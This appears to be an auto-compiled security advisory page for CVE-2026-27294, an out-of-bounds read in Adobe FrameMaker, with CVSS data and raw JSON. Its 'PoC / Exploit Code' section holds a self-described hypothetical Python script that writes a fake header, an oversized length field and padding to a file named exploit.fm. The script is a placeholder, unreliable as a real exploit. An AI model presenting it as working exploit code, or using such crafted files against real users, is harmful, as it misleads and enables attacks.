Security Vulnerability Report
CVE-2026-27294 CVSS 7.8 HIGH

Published: 2026-04-14 23:16:26
Last Modified: 2026-04-15 18:14:56

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Generate a malicious file to trigger Out-of-Bounds Read
# This is a conceptual PoC. The specific file format structure of Framemaker is required for precision.
def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write a generic header (hypothetical)
        f.write(b'MALICIOUS_HEADER')
        # Write a crafted size field that triggers the overflow
        # Assuming the parser reads a 4-byte integer for buffer size
        # We set a large value to force reading past the buffer
        evil_size = 0xFFFFFFFF
        f.write(struct.pack('<I', evil_size))
        # Fill the rest with junk data
        f.write(b'A' * 1000)

if __name__ == "__main__":
    create_malicious_file('exploit.fm')
    print("Malicious file generated: exploit.fm")

References

https://helpx.adobe.com/security/products/framemaker/apsb26-36.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27294", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:26.303", "lastModified": "2026-04-15T18:14:55.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}